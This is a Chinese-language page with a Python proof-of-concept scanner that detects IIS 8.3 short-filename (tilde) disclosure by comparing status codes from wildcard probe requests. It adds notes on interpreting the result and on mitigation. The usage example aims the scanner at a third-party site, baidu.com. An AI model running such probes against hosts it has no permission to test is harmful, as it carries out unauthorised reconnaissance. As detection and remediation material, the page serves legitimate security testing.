IIS短文件名称POC检测

使用方法

安装 Python 3 环境,并安装脚本依赖的 requests 库(pip install requests)

执行此文件:python [脚本文件名].py -u http://baidu.com(-u 后为待检测目标的 URL,必须带 http:// 或 https:// 前缀,否则脚本无法解析出协议和主机名)

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@File    :   IIS-ShortName-PoC.py
@tell    :   用于安全人员检测系统是否存在该漏洞,切勿用于非法用途
"""
import argparse
import re
import requests

from urllib.parse import urlparse

# Silence urllib3's warnings for the whole process. The probes in Scanner are
# sent with verify=False, which would otherwise emit a certificate warning on
# every HTTPS request.
requests.packages.urllib3.disable_warnings()

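class Scanner(object):
    """Detect IIS 8.3 short-name (tilde) disclosure by comparing status codes.

    Two paths are requested on the target host, one with the wildcard
    ``/*~1*/a.aspx`` and one with ``/invalid*~1*/a.aspx``, using both GET and
    OPTIONS. The host is reported as affected when the wildcard path answers
    404 while the invalid path answers something else.

    All requests are sent with ``verify=False``: TLS certificates are not
    validated, so hosts with self-signed certificates can still be checked,
    but the responses are unauthenticated and only their status codes are used.
    """

    # Raw string with an escaped dot: the previous non-raw pattern relied on an
    # invalid "\." string escape and used ".?" which matched any character.
    _IIS_VERSION_RE = re.compile(r'Microsoft-IIS/([0-9]+\.[0-9]+)', re.IGNORECASE)

    def __init__(self, url: str):
        """Store the target URL; no network traffic happens until a check runs."""
        self.url = url
        self.iis_version = None

        self._url_scheme = ''
        self._url_netloc = ''
        self._url_path = ''

        # Probe responses, filled in by is_vulnerable(). Initialised here so
        # callers can inspect them without hitting AttributeError after a
        # check that aborted early.
        self.valid_resp_get = None
        self.valid_resp_options = None
        self.invalid_resp_get = None
        self.invalid_resp_options = None

    def is_vulnerable(self) -> bool:
        """Return True when the status-code pattern indicates short-name disclosure.

        False is returned both when the pattern is absent and when the check
        could not be carried out (unparsable URL, no IIS version in the
        response headers, connection failure). Callers that need to tell these
        apart can look at ``iis_version`` and the ``*_resp_*`` attributes.
        """
        self._parse_url()
        if not self._url_scheme or not self._url_netloc:
            print('[!]ERROR: Can Not get parse target url.')
            # Without a scheme and host there is nothing to probe; stop here
            # instead of falling through to the network requests.
            return False

        self._get_iis_version()
        if not self.iis_version:
            print('[!]ERROR: Can Not get IIS version from http headers.')
            return False

        base = f'{self._url_scheme}://{self._url_netloc}'
        valid_url = base + '/*~1*/a.aspx'
        invalid_url = base + '/invalid*~1*/a.aspx'
        try:
            self.valid_resp_get = requests.get(url=valid_url, verify=False, timeout=10)
            self.valid_resp_options = requests.options(url=valid_url, verify=False, timeout=10)
            self.invalid_resp_get = requests.get(url=invalid_url, verify=False, timeout=10)
            self.invalid_resp_options = requests.options(url=invalid_url, verify=False, timeout=10)
        except Exception as err:
            print(f'[!]ERROR: HTTP Connection EROOR. {err}')
            return False

        # Either HTTP method showing "wildcard -> 404, invalid -> not 404" is
        # treated as a positive result.
        get_differs = (
            self.valid_resp_get.status_code == 404
            and self.invalid_resp_get.status_code != 404
        )
        options_differs = (
            self.valid_resp_options.status_code == 404
            and self.invalid_resp_options.status_code != 404
        )
        return get_differs or options_differs

    @staticmethod
    def _extract_iis_version(headers_text: str):
        """Return the ``major.minor`` IIS version found in *headers_text*, or None."""
        found = Scanner._IIS_VERSION_RE.search(headers_text)
        return found[1] if found else None

    def _get_iis_version(self):
        """Fetch ``self.url`` and record the IIS version advertised in its headers.

        ``iis_version`` stays None when the request fails or when no
        ``Microsoft-IIS/x.y`` token appears in any response header (for
        example when the banner is removed or rewritten by a proxy).
        """
        try:
            resp = requests.get(url=self.url, verify=False, timeout=15)
        except Exception as err:
            print(f'[!]ERROR: HTTP Connection EROOR. {err}')
            return
        version = self._extract_iis_version(str(resp.headers))
        if version is None:
            return
        self.iis_version = version

    def _parse_url(self):
        """Split ``self.url`` into scheme, network location and path."""
        parts = urlparse(self.url)
        self._url_scheme = parts.scheme
        self._url_netloc = parts.netloc
        self._url_path = parts.path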


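def main():
    """Parse ``-u/--url``, run the short-name check and print the outcome.

    A negative result is only reported as "NOT vulnerable" when an IIS version
    was read from the target. If ``scanner.iis_version`` is still unset the
    check never reached the probe stage, so the result is reported as
    inconclusive rather than as a clean bill of health. A connection failure
    during the probes themselves cannot be told apart here, because
    ``is_vulnerable()`` returns only a bool.
    """
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('-u','--url', help='The URL of the target.', action='store')
    args = arg_parser.parse_args()

    if not args.url:
        arg_parser.print_help()
        return

    scanner = Scanner(url=args.url)
    if not scanner.is_vulnerable():
        if scanner.iis_version:
            print('[*]INFO: Target is NOT vulnerable.')
        else:
            print('[!]WARN: Check is inconclusive, the target could not be tested.')
        return

    print('[*]INFO: Target is vulnerable.')
    # Same order as the probes were sent: GET then OPTIONS, wildcard path
    # before the invalid path.
    evidence = (
        ('GET', scanner.valid_resp_get),
        ('GET', scanner.invalid_resp_get),
        ('OPTIONS', scanner.valid_resp_options),
        ('OPTIONS', scanner.invalid_resp_options),
    )
    for method, resp in evidence:
        print('[*]INFO: <HTTP {}> URL:{} HTTP STATUS CODE:{}'.format(method, resp.request.url, resp.status_code))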

# Run the command-line check only when this file is executed directly,
# not when it is imported as a module.
if __name__ == '__main__':
    main()

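结果根据不同接口请求类型,返回值响应200或者404即存在漏洞。就上面的脚本而言,判定条件是:对 /*~1*/a.aspx 的 GET 或 OPTIONS 请求返回 404,而对 /invalid*~1*/a.aspx 的同类请求返回的不是 404。若请求失败,或响应头中没有 IIS 版本信息,脚本无法得出结论,不能据此认定目标不受影响。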

 解决措施

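比较简单、自行百度。常见做法:关闭 NTFS 的 8.3 短文件名生成(fsutil behavior set disable8dot3 1,或将注册表项 NtfsDisable8dot3NameCreation 设为 1)。关闭后已存在的短文件名不会自动消失,需要重新创建(如复制后替换)站点文件才会去除。另外可在 IIS 请求筛选中拒绝包含 ~ 的 URL。修复后用上面的脚本复测确认。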
